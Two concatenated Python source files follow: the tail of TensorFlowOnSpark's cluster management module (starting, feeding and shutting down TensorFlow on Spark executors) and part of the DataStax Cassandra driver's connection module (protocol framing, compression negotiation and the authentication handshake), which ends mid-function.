Returns:
A Spark RDD representing the output of the TensorFlow inferencing
"""
logging.info("Feeding inference data")
assert(self.input_mode == InputMode.SPARK)
assert(qname in self.queues)
return dataRDD.mapPartitions(TFSparkNode.inference(self.cluster_info, qname))
def shutdown(self, ssc=None, grace_secs=0):
"""Stops the distributed TensorFlow cluster.
Args:
:ssc: *For Streaming applications only*. Spark StreamingContext
:grace_secs: Grace period to wait before terminating the Spark application, e.g. to allow the chief worker to perform any final/cleanup duties like exporting or evaluating the model.
"""
logging.info("Stopping TensorFlow nodes")
# identify ps/workers
ps_list, worker_list = [], []
for node in self.cluster_info:
(ps_list if node['job_name'] == 'ps' else worker_list).append(node)
if ssc is not None:
# Spark Streaming
while not ssc.awaitTerminationOrTimeout(1):
if self.server.done:
logging.info("Server done, stopping StreamingContext")
ssc.stop(stopSparkContext=False, stopGraceFully=True)
break
elif self.input_mode == InputMode.TENSORFLOW:
# in TENSORFLOW mode, there is no "data feeding" job, only a "start" job, so we must wait for the TensorFlow workers
# to complete all tasks, while accounting for any PS tasks which run indefinitely.
count = 0
while count < 3:
st = self.sc.statusTracker()
jobs = st.getActiveJobsIds()
if len(jobs) == 0:
break
stages = st.getActiveStageIds()
for i in stages:
si = st.getStageInfo(i)
if si.numActiveTasks == len(ps_list):
# if we only have PS tasks left, check that we see this condition a couple times
count += 1
time.sleep(5)
# shutdown queues and managers for "worker" executors.
# note: in SPARK mode, this job will immediately queue up behind the "data feeding" job.
# in TENSORFLOW mode, this will only run after all workers have finished.
workers = len(worker_list)
workerRDD = self.sc.parallelize(range(workers), workers)
workerRDD.foreachPartition(TFSparkNode.shutdown(self.cluster_info, self.queues))
time.sleep(grace_secs)
# exit Spark application w/ err status if TF job had any errors
if 'error' in tf_status:
logging.error("Exiting Spark application with error status.")
self.sc.cancelAllJobs()
self.sc.stop()
sys.exit(1)
logging.info("Shutting down cluster")
# shutdown queues and managers for "PS" executors.
# note: we have to connect/shutdown from the spark driver, because these executors are "busy" and won't accept any other tasks.
for node in ps_list:
addr = node['addr']
authkey = node['authkey']
m = TFManager.connect(addr, authkey)
q = m.get_queue('control')
q.put(None)
q.join()
# wait for all jobs to finish
while True:
time.sleep(5)
st = self.sc.statusTracker()
jobs = st.getActiveJobsIds()
if len(jobs) == 0:
break
def tensorboard_url(self):
"""Utility function to get the Tensorboard URL"""
for node in self.cluster_info:
if node['tb_port'] != 0:
return "http://{0}:{1}".format(node['host'], node['tb_port'])
return None
def run(sc, map_fun, tf_args, num_executors, num_ps, tensorboard=False, input_mode=InputMode.TENSORFLOW,
log_dir=None, driver_ps_nodes=False, master_node=None, reservation_timeout=600, queues=['input', 'output', 'error']):
"""Starts the TensorFlowOnSpark cluster and Runs the TensorFlow "main" function on the Spark executors
Args:
:sc: SparkContext
:map_fun: user-supplied TensorFlow "main" function
:tf_args: ``argparse`` args, or command-line ``ARGV``. These will be passed to the ``map_fun``.
:num_executors: number of Spark executors. This should match your Spark job's ``--num_executors``.
:num_ps: number of Spark executors which are reserved for TensorFlow PS nodes. All other executors will be used as TensorFlow worker nodes.
:tensorboard: boolean indicating if the chief worker should spawn a Tensorboard server.
:input_mode: TFCluster.InputMode
:log_dir: directory to save tensorboard event logs. If None, defaults to a fixed path on local filesystem.
    :driver_ps_nodes: run the PS nodes on the driver locally instead of on the spark executors; this helps maximize computing resources (esp. GPU). You will need to set cluster_size = num_executors + num_ps
:master_node: name of the "master" or "chief" node in the cluster_template, used for `tf.estimator` applications.
:reservation_timeout: number of seconds after which cluster reservation times out (600 sec default)
:queues: *INTERNAL_USE*
Returns:
A TFCluster object representing the started cluster.
"""
logging.info("Reserving TFSparkNodes {0}".format("w/ TensorBoard" if tensorboard else ""))
assert(num_ps < num_executors)
if driver_ps_nodes and input_mode != InputMode.TENSORFLOW:
raise Exception('running PS nodes on driver locally is only supported in InputMode.TENSORFLOW')
# build a cluster_spec template using worker_nums
cluster_template = {}
cluster_template['ps'] = range(num_ps)
if master_node is None:
cluster_template['worker'] = range(num_ps, num_executors)
else:
cluster_template[master_node] = range(num_ps, num_ps + 1)
if num_executors > num_ps + 1:
cluster_template['worker'] = range(num_ps + 1, num_executors)
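  # For example, with num_ps=1, num_executors=4 and no master_node, the template above
  # works out to {'ps': range(0, 1), 'worker': range(1, 4)} (illustrative values).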
logging.info("cluster_template: {}".format(cluster_template))
# get default filesystem from spark
defaultFS = sc._jsc.hadoopConfiguration().get("fs.defaultFS")
# strip trailing "root" slash from "file:///" to be consistent w/ "hdfs://..."
if defaultFS.startswith("file://") and len(defaultFS) > 7 and defaultFS.endswith("/"):
defaultFS = defaultFS[:-1]
# get current working dir of spark launch
working_dir = os.getcwd()
# start a server to listen for reservations and broadcast cluster_spec
server = reservation.Server(num_executors)
server_addr = server.start()
# start TF nodes on all executors
logging.info("Starting TensorFlow on executors")
cluster_meta = {
'id': random.getrandbits(64),
'cluster_template': cluster_template,
'num_executors': num_executors,
'default_fs': defaultFS,
'working_dir': working_dir,
'server_addr': server_addr
}
if driver_ps_nodes:
nodeRDD = sc.parallelize(range(num_ps, num_executors), num_executors - num_ps)
else:
nodeRDD = sc.parallelize(range(num_executors), num_executors)
if driver_ps_nodes:
def _start_ps(node_index):
logging.info("starting ps node locally %d" % node_index)
TFSparkNode.run(map_fun,
tf_args,
cluster_meta,
tensorboard,
log_dir,
queues,
background=(input_mode == InputMode.SPARK))([node_index])
for i in cluster_template['ps']:
ps_thread = threading.Thread(target=lambda: _start_ps(i))
ps_thread.daemon = True
ps_thread.start()
# start TF on a background thread (on Spark driver) to allow for feeding job
def _start(status):
try:
nodeRDD.foreachPartition(TFSparkNode.run(map_fun,
tf_args,
cluster_meta,
tensorboard,
log_dir,
queues,
background=(input_mode == InputMode.SPARK)))
except Exception as e:
logging.error("Exception in TF background thread")
status['error'] = str(e)
t = threading.Thread(target=_start, args=(tf_status,))
# run as daemon thread so that in spark mode main thread can exit
# if feeder spark stage fails and main thread can't do explicit shutdown
t.daemon = True
t.start()
# wait for executors to register and start TFNodes before continuing
logging.info("Waiting for TFSparkNodes to start")
cluster_info = server.await_reservations(sc, tf_status, reservation_timeout)
logging.info("All TFSparkNodes started")
# print cluster_info and extract TensorBoard URL
tb_url = None
for node in cluster_info:
logging.info(node)
if node['tb_port'] != 0:
tb_url = "http://{0}:{1}".format(node['host'], node['tb_port'])
if tb_url is not None:
logging.info("========================================================================================")
logging.info("")
logging.info("TensorBoard running at: {0}".format(tb_url))
logging.info("")
logging.info("========================================================================================")
# since our "primary key" for each executor's TFManager is (host, executor_id), sanity check for duplicates
# Note: this may occur if Spark retries failed Python tasks on the same executor.
tb_nodes = set()
for node in cluster_info:
node_id = (node['host'], node['executor_id'])
if node_id in tb_nodes:
raise Exception("Duplicate cluster node id detected (host={0}, executor_id={1})".format(node_id[0], node_id[1]) +
"Please ensure that:\n" +
"1. Number of executors >= number of TensorFlow nodes\n" +
"2. Number of tasks per executors is 1\n" +
"3, TFCluster.shutdown() is successfully invoked when done.")
else:
tb_nodes.add(node_id)
# create TFCluster object
cluster = TFCluster()
cluster.sc = sc
cluster.meta = cluster_meta
cluster.nodeRDD = nodeRDD
cluster.cluster_info = cluster_info
cluster.cluster_meta = cluster_meta
cluster.input_mode = input_mode
cluster.queues = queues
cluster.server = server
return cluster
|
connection.py
|
# Copyright DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import # to enable import io from stdlib
from collections import defaultdict, deque
import errno
from functools import wraps, partial
from heapq import heappush, heappop
import io
import logging
import six
from six.moves import range
import socket
import struct
import sys
from threading import Thread, Event, RLock
import time
try:
import ssl
except ImportError:
ssl = None # NOQA
if 'gevent.monkey' in sys.modules:
from gevent.queue import Queue, Empty
else:
from six.moves.queue import Queue, Empty # noqa
from cassandra import ConsistencyLevel, AuthenticationFailed, OperationTimedOut, ProtocolVersion
from cassandra.marshal import int32_pack
from cassandra.protocol import (ReadyMessage, AuthenticateMessage, OptionsMessage,
StartupMessage, ErrorMessage, CredentialsMessage,
QueryMessage, ResultMessage, ProtocolHandler,
InvalidRequestException, SupportedMessage,
AuthResponseMessage, AuthChallengeMessage,
AuthSuccessMessage, ProtocolException,
RegisterMessage)
from cassandra.util import OrderedDict
log = logging.getLogger(__name__)
# We use an ordered dictionary and specifically add lz4 before
# snappy so that lz4 will be preferred. Changing the order of this
# will change the compression preferences for the driver.
locally_supported_compressions = OrderedDict()
try:
import lz4
except ImportError:
pass
else:
# The compress and decompress functions we need were moved from the lz4 to
# the lz4.block namespace, so we try both here.
try:
from lz4 import block as lz4_block
except ImportError:
lz4_block = lz4
# Cassandra writes the uncompressed message length in big endian order,
# but the lz4 lib requires little endian order, so we wrap these
# functions to handle that
def lz4_compress(byts):
# write length in big-endian instead of little-endian
return int32_pack(len(byts)) + lz4_block.compress(byts)[4:]
def lz4_decompress(byts):
# flip from big-endian to little-endian
return lz4_block.decompress(byts[3::-1] + byts[4:])
locally_supported_compressions['lz4'] = (lz4_compress, lz4_decompress)
try:
import snappy
except ImportError:
pass
else:
# work around apparently buggy snappy decompress
def decompress(byts):
if byts == '\x00':
return ''
return snappy.decompress(byts)
locally_supported_compressions['snappy'] = (snappy.compress, decompress)
PROTOCOL_VERSION_MASK = 0x7f
HEADER_DIRECTION_FROM_CLIENT = 0x00
HEADER_DIRECTION_TO_CLIENT = 0x80
HEADER_DIRECTION_MASK = 0x80
frame_header_v1_v2 = struct.Struct('>BbBi')
frame_header_v3 = struct.Struct('>BhBi')
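# A note added for clarity, derived from the struct formats above: after the leading
# version byte, a frame header is
#   v1/v2: flags (B), stream id (signed byte), opcode (B), body length (int32)
#   v3+:   flags (B), stream id (signed short), opcode (B), body length (int32)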
class _Frame(object):
def __init__(self, version, flags, stream, opcode, body_offset, end_pos):
self.version = version
self.flags = flags
self.stream = stream
self.opcode = opcode
self.body_offset = body_offset
self.end_pos = end_pos
def __eq__(self, other): # facilitates testing
if isinstance(other, _Frame):
return (self.version == other.version and
self.flags == other.flags and
self.stream == other.stream and
self.opcode == other.opcode and
self.body_offset == other.body_offset and
self.end_pos == other.end_pos)
return NotImplemented
def __str__(self):
return "ver({0}); flags({1:04b}); stream({2}); op({3}); offset({4}); len({5})".format(self.version, self.flags, self.stream, self.opcode, self.body_offset, self.end_pos - self.body_offset)
NONBLOCKING = (errno.EAGAIN, errno.EWOULDBLOCK)
class ConnectionException(Exception):
"""
An unrecoverable error was hit when attempting to use a connection,
or the connection was already closed or defunct.
"""
def __init__(self, message, host=None):
Exception.__init__(self, message)
self.host = host
class ConnectionShutdown(ConnectionException):
"""
Raised when a connection has been marked as defunct or has been closed.
"""
pass
class ProtocolVersionUnsupported(ConnectionException):
"""
Server rejected startup message due to unsupported protocol version
"""
def __init__(self, host, startup_version):
msg = "Unsupported protocol version on %s: %d" % (host, startup_version)
super(ProtocolVersionUnsupported, self).__init__(msg, host)
self.startup_version = startup_version
class ConnectionBusy(Exception):
"""
An attempt was made to send a message through a :class:`.Connection` that
was already at the max number of in-flight operations.
"""
pass
class ProtocolError(Exception):
"""
Communication did not match the protocol that this driver expects.
"""
pass
def defunct_on_error(f):
@wraps(f)
def wrapper(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
except Exception as exc:
self.defunct(exc)
return wrapper
DEFAULT_CQL_VERSION = '3.0.0'
if six.PY3:
def int_from_buf_item(i):
return i
else:
int_from_buf_item = ord
class Connection(object):
CALLBACK_ERR_THREAD_THRESHOLD = 100
in_buffer_size = 4096
out_buffer_size = 4096
cql_version = None
no_compact = False
protocol_version = ProtocolVersion.MAX_SUPPORTED
keyspace = None
compression = True
compressor = None
decompressor = None
ssl_options = None
last_error = None
# The current number of operations that are in flight. More precisely,
# the number of request IDs that are currently in use.
in_flight = 0
# Max concurrent requests allowed per connection. This is set optimistically high, allowing
# all request ids to be used in protocol version 3+. Normally concurrency would be controlled
# at a higher level by the application or concurrent.execute_concurrent. This attribute
# is for lower-level integrations that want some upper bound without reimplementing.
max_in_flight = 2 ** 15
# A set of available request IDs. When using the v3 protocol or higher,
# this will not initially include all request IDs in order to save memory,
# but the set will grow if it is exhausted.
request_ids = None
# Tracks the highest used request ID in order to help with growing the
# request_ids set
highest_request_id = 0
is_defunct = False
is_closed = False
lock = None
user_type_map = None
msg_received = False
is_unsupported_proto_version = False
is_control_connection = False
signaled_error = False # used for flagging at the pool level
allow_beta_protocol_version = False
_iobuf = None
_current_frame = None
_socket = None
_socket_impl = socket
_ssl_impl = ssl
_check_hostname = False
def __init__(self, host='127.0.0.1', port=9042, authenticator=None,
ssl_options=None, sockopts=None, compression=True,
cql_version=None, protocol_version=ProtocolVersion.MAX_SUPPORTED, is_control_connection=False,
user_type_map=None, connect_timeout=None, allow_beta_protocol_version=False, no_compact=False):
self.host = host
self.port = port
self.authenticator = authenticator
self.ssl_options = ssl_options.copy() if ssl_options else None
self.sockopts = sockopts
self.compression = compression
self.cql_version = cql_version
self.protocol_version = protocol_version
self.is_control_connection = is_control_connection
self.user_type_map = user_type_map
self.connect_timeout = connect_timeout
self.allow_beta_protocol_version = allow_beta_protocol_version
self.no_compact = no_compact
self._push_watchers = defaultdict(set)
self._requests = {}
self._iobuf = io.BytesIO()
if ssl_options:
self._check_hostname = bool(self.ssl_options.pop('check_hostname', False))
if self._check_hostname:
if not getattr(ssl, 'match_hostname', None):
raise RuntimeError("ssl_options specify 'check_hostname', but ssl.match_hostname is not provided. "
"Patch or upgrade Python to use this option.")
if protocol_version >= 3:
self.max_request_id = min(self.max_in_flight - 1, (2 ** 15) - 1)
# Don't fill the deque with 2**15 items right away. Start with some and add
# more if needed.
initial_size = min(300, self.max_in_flight)
self.request_ids = deque(range(initial_size))
self.highest_request_id = initial_size - 1
else:
self.max_request_id = min(self.max_in_flight, (2 ** 7) - 1)
self.request_ids = deque(range(self.max_request_id + 1))
self.highest_request_id = self.max_request_id
self.lock = RLock()
self.connected_event = Event()
@classmethod
def initialize_reactor(cls):
"""
Called once by Cluster.connect(). This should be used by implementations
to set up any resources that will be shared across connections.
"""
pass
@classmethod
def handle_fork(cls):
"""
Called after a forking. This should cleanup any remaining reactor state
from the parent process.
"""
pass
@classmethod
def create_timer(cls, timeout, callback):
raise NotImplementedError()
@classmethod
def factory(cls, host, timeout, *args, **kwargs):
"""
A factory function which returns connections which have
succeeded in connecting and are ready for service (or
raises an exception otherwise).
"""
start = time.time()
kwargs['connect_timeout'] = timeout
conn = cls(host, *args, **kwargs)
elapsed = time.time() - start
conn.connected_event.wait(timeout - elapsed)
if conn.last_error:
if conn.is_unsupported_proto_version:
raise ProtocolVersionUnsupported(host, conn.protocol_version)
raise conn.last_error
elif not conn.connected_event.is_set():
conn.close()
raise OperationTimedOut("Timed out creating connection (%s seconds)" % timeout)
else:
return conn
def _connect_socket(self):
sockerr = None
addresses = socket.getaddrinfo(self.host, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM)
if not addresses:
raise ConnectionException("getaddrinfo returned empty list for %s" % (self.host,))
for (af, socktype, proto, canonname, sockaddr) in addresses:
try:
self._socket = self._socket_impl.socket(af, socktype, proto)
if self.ssl_options:
if not self._ssl_impl:
raise RuntimeError("This version of Python was not compiled with SSL support")
self._socket = self._ssl_impl.wrap_socket(self._socket, **self.ssl_options)
self._socket.settimeout(self.connect_timeout)
self._socket.connect(sockaddr)
self._socket.settimeout(None)
if self._check_hostname:
ssl.match_hostname(self._socket.getpeercert(), self.host)
sockerr = None
break
except socket.error as err:
if self._socket:
self._socket.close()
self._socket = None
sockerr = err
if sockerr:
raise socket.error(sockerr.errno, "Tried connecting to %s. Last error: %s" % ([a[4] for a in addresses], sockerr.strerror or sockerr))
if self.sockopts:
for args in self.sockopts:
self._socket.setsockopt(*args)
def close(self):
raise NotImplementedError()
def defunct(self, exc):
with self.lock:
if self.is_defunct or self.is_closed:
return
self.is_defunct = True
exc_info = sys.exc_info()
# if we are not handling an exception, just use the passed exception, and don't try to format exc_info with the message
if any(exc_info):
log.debug("Defuncting connection (%s) to %s:",
id(self), self.host, exc_info=exc_info)
else:
log.debug("Defuncting connection (%s) to %s: %s",
id(self), self.host, exc)
self.last_error = exc
self.close()
self.error_all_requests(exc)
self.connected_event.set()
return exc
def error_all_requests(self, exc):
with self.lock:
requests = self._requests
self._requests = {}
if not requests:
return
new_exc = ConnectionShutdown(str(exc))
def try_callback(cb):
try:
cb(new_exc)
except Exception:
log.warning("Ignoring unhandled exception while erroring requests for a "
"failed connection (%s) to host %s:",
id(self), self.host, exc_info=True)
# run first callback from this thread to ensure pool state before leaving
cb, _, _ = requests.popitem()[1]
try_callback(cb)
if not requests:
return
# additional requests are optionally errored from a separate thread
# The default callback and retry logic is fairly expensive -- we don't
# want to tie up the event thread when there are many requests
def err_all_callbacks():
for cb, _, _ in requests.values():
try_callback(cb)
if len(requests) < Connection.CALLBACK_ERR_THREAD_THRESHOLD:
err_all_callbacks()
else:
# daemon thread here because we want to stay decoupled from the cluster TPE
# TODO: would it make sense to just have a driver-global TPE?
t = Thread(target=err_all_callbacks)
t.daemon = True
t.start()
def get_request_id(self):
"""
This must be called while self.lock is held.
"""
try:
return self.request_ids.popleft()
except IndexError:
new_request_id = self.highest_request_id + 1
# in_flight checks should guarantee this
assert new_request_id <= self.max_request_id
self.highest_request_id = new_request_id
return self.highest_request_id
def handle_pushed(self, response):
log.debug("Message pushed from server: %r", response)
for cb in self._push_watchers.get(response.event_type, []):
try:
cb(response.event_args)
except Exception:
log.exception("Pushed event handler errored, ignoring:")
def send_msg(self, msg, request_id, cb, encoder=ProtocolHandler.encode_message, decoder=ProtocolHandler.decode_message, result_metadata=None):
if self.is_defunct:
raise ConnectionShutdown("Connection to %s is defunct" % self.host)
elif self.is_closed:
raise ConnectionShutdown("Connection to %s is closed" % self.host)
# queue the decoder function with the request
# this allows us to inject custom functions per request to encode, decode messages
self._requests[request_id] = (cb, decoder, result_metadata)
msg = encoder(msg, request_id, self.protocol_version, compressor=self.compressor, allow_beta_protocol_version=self.allow_beta_protocol_version)
self.push(msg)
return len(msg)
def wait_for_response(self, msg, timeout=None):
return self.wait_for_responses(msg, timeout=timeout)[0]
def wait_for_responses(self, *msgs, **kwargs):
"""
Returns a list of (success, response) tuples. If success
is False, response will be an Exception. Otherwise, response
will be the normal query response.
If fail_on_error was left as True and one of the requests
failed, the corresponding Exception will be raised.
"""
if self.is_closed or self.is_defunct:
raise ConnectionShutdown("Connection %s is already closed" % (self, ))
timeout = kwargs.get('timeout')
fail_on_error = kwargs.get('fail_on_error', True)
waiter = ResponseWaiter(self, len(msgs), fail_on_error)
# busy wait for sufficient space on the connection
messages_sent = 0
while True:
needed = len(msgs) - messages_sent
with self.lock:
available = min(needed, self.max_request_id - self.in_flight + 1)
request_ids = [self.get_request_id() for _ in range(available)]
self.in_flight += available
for i, request_id in enumerate(request_ids):
self.send_msg(msgs[messages_sent + i],
request_id,
partial(waiter.got_response, index=messages_sent + i))
messages_sent += available
if messages_sent == len(msgs):
break
else:
if timeout is not None:
timeout -= 0.01
if timeout <= 0.0:
raise OperationTimedOut()
time.sleep(0.01)
try:
return waiter.deliver(timeout)
except OperationTimedOut:
raise
except Exception as exc:
self.defunct(exc)
raise
def register_watcher(self, event_type, callback, register_timeout=None):
"""
Register a callback for a given event type.
"""
self._push_watchers[event_type].add(callback)
self.wait_for_response(
RegisterMessage(event_list=[event_type]),
timeout=register_timeout)
def register_watchers(self, type_callback_dict, register_timeout=None):
"""
Register multiple callback/event type pairs, expressed as a dict.
"""
for event_type, callback in type_callback_dict.items():
self._push_watchers[event_type].add(callback)
self.wait_for_response(
RegisterMessage(event_list=type_callback_dict.keys()),
timeout=register_timeout)
def control_conn_disposed(self):
self.is_control_connection = False
self._push_watchers = {}
@defunct_on_error
def _read_frame_header(self):
buf = self._iobuf.getvalue()
pos = len(buf)
if pos:
version = int_from_buf_item(buf[0]) & PROTOCOL_VERSION_MASK
if version > ProtocolVersion.MAX_SUPPORTED:
raise ProtocolError("This version of the driver does not support protocol version %d" % version)
frame_header = frame_header_v3 if version >= 3 else frame_header_v1_v2
# this frame header struct is everything after the version byte
header_size = frame_header.size + 1
if pos >= header_size:
flags, stream, op, body_len = frame_header.unpack_from(buf, 1)
if body_len < 0:
raise ProtocolError("Received negative body length: %r" % body_len)
self._current_frame = _Frame(version, flags, stream, op, header_size, body_len + header_size)
return pos
def _reset_frame(self):
self._iobuf = io.BytesIO(self._iobuf.read())
self._iobuf.seek(0, 2) # io.SEEK_END == 2 (constant not present in 2.6)
self._current_frame = None
def process_io_buffer(self):
while True:
if not self._current_frame:
pos = self._read_frame_header()
else:
pos = self._iobuf.tell()
if not self._current_frame or pos < self._current_frame.end_pos:
# we don't have a complete header yet or we
# already saw a header, but we don't have a
# complete message yet
return
else:
frame = self._current_frame
self._iobuf.seek(frame.body_offset)
msg = self._iobuf.read(frame.end_pos - frame.body_offset)
self.process_msg(frame, msg)
self._reset_frame()
@defunct_on_error
def process_msg(self, header, body):
self.msg_received = True
stream_id = header.stream
if stream_id < 0:
callback = None
decoder = ProtocolHandler.decode_message
result_metadata = None
else:
try:
callback, decoder, result_metadata = self._requests.pop(stream_id)
# This can only happen if the stream_id was
# removed due to an OperationTimedOut
except KeyError:
return
with self.lock:
self.request_ids.append(stream_id)
try:
response = decoder(header.version, self.user_type_map, stream_id,
header.flags, header.opcode, body, self.decompressor, result_metadata)
except Exception as exc:
log.exception("Error decoding response from Cassandra. "
"%s; buffer: %r", header, self._iobuf.getvalue())
if callback is not None:
callback(exc)
self.defunct(exc)
return
try:
if stream_id >= 0:
if isinstance(response, ProtocolException):
if 'unsupported protocol version' in response.message:
self.is_unsupported_proto_version = True
else:
log.error("Closing connection %s due to protocol error: %s", self, response.summary_msg())
self.defunct(response)
if callback is not None:
callback(response)
else:
self.handle_pushed(response)
except Exception:
log.exception("Callback handler errored, ignoring:")
@defunct_on_error
def _send_options_message(self):
if self.cql_version is None and (not self.compression or not locally_supported_compressions):
log.debug("Not sending options message for new connection(%s) to %s "
"because compression is disabled and a cql version was not "
"specified", id(self), self.host)
self._compressor = None
self.cql_version = DEFAULT_CQL_VERSION
self._send_startup_message(no_compact=self.no_compact)
else:
log.debug("Sending initial options message for new connection (%s) to %s", id(self), self.host)
self.send_msg(OptionsMessage(), self.get_request_id(), self._handle_options_response)
@defunct_on_error
def _handle_options_response(self, options_response):
if self.is_defunct:
return
if not isinstance(options_response, SupportedMessage):
if isinstance(options_response, ConnectionException):
raise options_response
else:
log.error("Did not get expected SupportedMessage response; "
"instead, got: %s", options_response)
raise ConnectionException("Did not get expected SupportedMessage "
"response; instead, got: %s"
% (options_response,))
log.debug("Received options response on new connection (%s) from %s",
id(self), self.host)
supported_cql_versions = options_response.cql_versions
remote_supported_compressions = options_response.options['COMPRESSION']
if self.cql_version:
if self.cql_version not in supported_cql_versions:
raise ProtocolError(
"cql_version %r is not supported by remote (w/ native "
"protocol). Supported versions: %r"
% (self.cql_version, supported_cql_versions))
else:
self.cql_version = supported_cql_versions[0]
self._compressor = None
compression_type = None
if self.compression:
overlap = (set(locally_supported_compressions.keys()) &
set(remote_supported_compressions))
if len(overlap) == 0:
log.debug("No available compression types supported on both ends."
" locally supported: %r. remotely supported: %r",
locally_supported_compressions.keys(),
remote_supported_compressions)
else:
compression_type = None
if isinstance(self.compression, six.string_types):
# the user picked a specific compression type ('snappy' or 'lz4')
if self.compression not in remote_supported_compressions:
raise ProtocolError(
"The requested compression type (%s) is not supported by the Cassandra server at %s"
% (self.compression, self.host))
compression_type = self.compression
else:
# our locally supported compressions are ordered to prefer
# lz4, if available
for k in locally_supported_compressions.keys():
if k in overlap:
compression_type = k
break
# set the decompressor here, but set the compressor only after
# a successful Ready message
self._compressor, self.decompressor = \
locally_supported_compressions[compression_type]
self._send_startup_message(compression_type, no_compact=self.no_compact)
@defunct_on_error
def _send_startup_message(self, compression=None, no_compact=False):
log.debug("Sending StartupMessage on %s", self)
opts = {}
if compression:
opts['COMPRESSION'] = compression
if no_compact:
opts['NO_COMPACT'] = 'true'
sm = StartupMessage(cqlversion=self.cql_version, options=opts)
self.send_msg(sm, self.get_request_id(), cb=self._handle_startup_response)
log.debug("Sent StartupMessage on %s", self)
@defunct_on_error
def _handle_startup_response(self, startup_response, did_authenticate=False):
if self.is_defunct:
return
if isinstance(startup_response, ReadyMessage):
if self.authenticator:
log.warning("An authentication challenge was not sent, "
"this is suspicious because the driver expects "
"authentication (configured authenticator = %s)",
self.authenticator.__class__.__name__)
log.debug("Got ReadyMessage on new connection (%s) from %s", id(self), self.host)
if self._compressor:
self.compressor = self._compressor
self.connected_event.set()
elif isinstance(startup_response, AuthenticateMessage):
log.debug("Got AuthenticateMessage on new connection (%s) from %s: %s",
id(self), self.host, startup_response.authenticator)
if self.authenticator is None:
raise AuthenticationFailed('Remote end requires authentication.')
if isinstance(self.authenticator, dict):
log.debug("Sending credentials-based auth response on %s", self)
cm = CredentialsMessage(creds=self.authenticator)
callback = partial(self._handle_startup_response, did_authenticate=True)
self.send_msg(cm, self.get_request_id(), cb=callback)
else:
log.debug("Sending SASL-based auth response on %s", self)
self.authenticator.server_authenticator_class = startup_response.authenticator
initial_response = self.authenticator.initial_response()
initial_response = "" if initial_response is None else initial_response
self.send_msg(AuthResponseMessage(initial_response), self.get_request_id(), self._handle_auth_response)
elif isinstance(startup_response, ErrorMessage):
log.debug("Received ErrorMessage on new connection (%s) from %s: %s",
id(self), self.host, startup_response.summary_msg())
if did_authenticate:
raise AuthenticationFailed(
"Failed to authenticate to %s: %s" %
(self.host, startup_response.summary_msg()))
else:
raise ConnectionException(
"Failed to initialize new connection to %s: %s"
% (self.host, startup_response.summary_msg()))
elif isinstance(startup_response, ConnectionShutdown):
log.debug("Connection to %s was closed during the startup handshake", (self.host))
raise startup_response
else:
msg = "Unexpected response during Connection setup: %r"
log.error(msg, startup_response)
raise ProtocolError(msg % (startup_response,))
@defunct_on_error
def _handle_auth_response(self, auth_response):
if self.is_defunct:
return
if isinstance(auth_response, AuthSuccessMessage):
log.debug("Connection %s successfully authenticated", self)
self.authenticator.on_authentication_success(auth_response.token)
if self._compressor:
self.compressor = self._compressor
self.connected_event.set()
elif isinstance(auth_response, AuthChallengeMessage):
response = self.authenticator.evaluate_challenge(auth_response.challenge)
msg = AuthResponseMessage("" if response is None else response)
log.debug("Responding to auth challenge on %s", self)
self.send_msg(msg, self.get_request_id(), self._handle_auth_response)
elif isinstance(auth_response, ErrorMessage):
log.debug("Received ErrorMessage on new connection (%s) from %s: %s",
id(self), self.host, auth_response.summary_msg())
raise AuthenticationFailed(
"Failed to authenticate to %s: %s" %
(self.host, auth_response.summary_msg()))
elif isinstance(auth_response, ConnectionShutdown):
log.debug("Connection to %s was closed during the authentication process", self.host)
raise auth_response
else:
msg = "Unexpected response during Connection authentication to %s: %r"
log.error(msg, self.host, auth_response)
raise ProtocolError(msg % (self.host, auth_response))
def set_keyspace_blocking(self, keyspace):
if not keyspace or keyspace == self.keyspace:
return
query = QueryMessage(query='USE "%s"' % (keyspace,),
consistency_level=ConsistencyLevel.ONE)
try:
result = self.wait_for_response(query)
except InvalidRequestException as ire:
# the keyspace probably doesn't exist
raise ire.to_exception()
except Exception as exc:
conn_exc = ConnectionException(
"Problem while setting keyspace: %r" % (exc,), self.host)
self.defunct(conn_exc)
raise conn_exc
if isinstance(result, ResultMessage):
self.keyspace = keyspace
else:
conn_exc = ConnectionException(
"Problem while setting keyspace: %r" % (result,), self.host)
self.defunct(conn_exc)
raise conn_exc
def set_keyspace_async(self, keyspace, callback):
"""
Use this in order to avoid deadlocking the event loop thread.
When the operation completes, `callback` will be called with
two arguments: this connection and an Exception if an error
occurred, otherwise :const:`None`.
This method will always increment :attr:`.in_flight` attribute, even if
it doesn't need to make a request, just to maintain an
":attr:`.in_flight` is incremented" invariant.
"""
# Here we increment in_flight unconditionally, whether we need to issue
# a request or not. This is bad, but allows callers -- specifically
# _set_keyspace_for_all_conns -- to assume that we increment
# self.in_flight during this call. This allows the passed callback to
# safely call HostConnection{Pool,}.return_connection on this
# Connection.
#
# We use a busy wait on the lock here because:
# - we'll only spin if the connection is at max capacity, which is very
# unlikely for a set_keyspace call
# - it allows us to avoid signaling a condition every time a request completes
while True:
with self.lock:
if self.in_flight < self.max_request_id:
self.in_flight += 1
break
time.sleep(0.001)
if not keyspace or keyspace == self.keyspace:
callback(self, None)
return
query = QueryMessage(query='USE "%s"' % (keyspace,),
consistency_level=ConsistencyLevel.ONE)
def process_result(result):
if isinstance(result, ResultMessage):
self.keyspace = keyspace
callback(self, None)
elif isinstance(result, InvalidRequestException):
callback(self, result.to_exception())
else:
callback(self, self.defunct(ConnectionException(
"Problem while setting keyspace: %r" % (result,), self.host)))
# We've incremented self.in_flight above, so we "have permission" to
# acquire a new request id
request_id = self.get_request_id()
self.send_msg(query, request_id, process_result)
@property
def is_idle(self):
return not self.msg_received
def reset_idle(self):
self.msg_received = False
def __str__(self):
status = ""
if self.is_defunct:
status = " (defunct)"
elif self.is_closed:
status = " (closed)"
return "<%s(%r) %s:%d%s>" % (self.__class__.__name__, id(self), self.host, self.port, status)
__repr__ = __str__
class ResponseWaiter(object):
def __init__(self, connection, num_responses, fail_on_error):
self.connection = connection
self.pending = num_responses
self.fail_on_error = fail_on_error
self.error = None
self.responses = [None] * num_responses
self.event = Event()
def got_response(self, response, index):
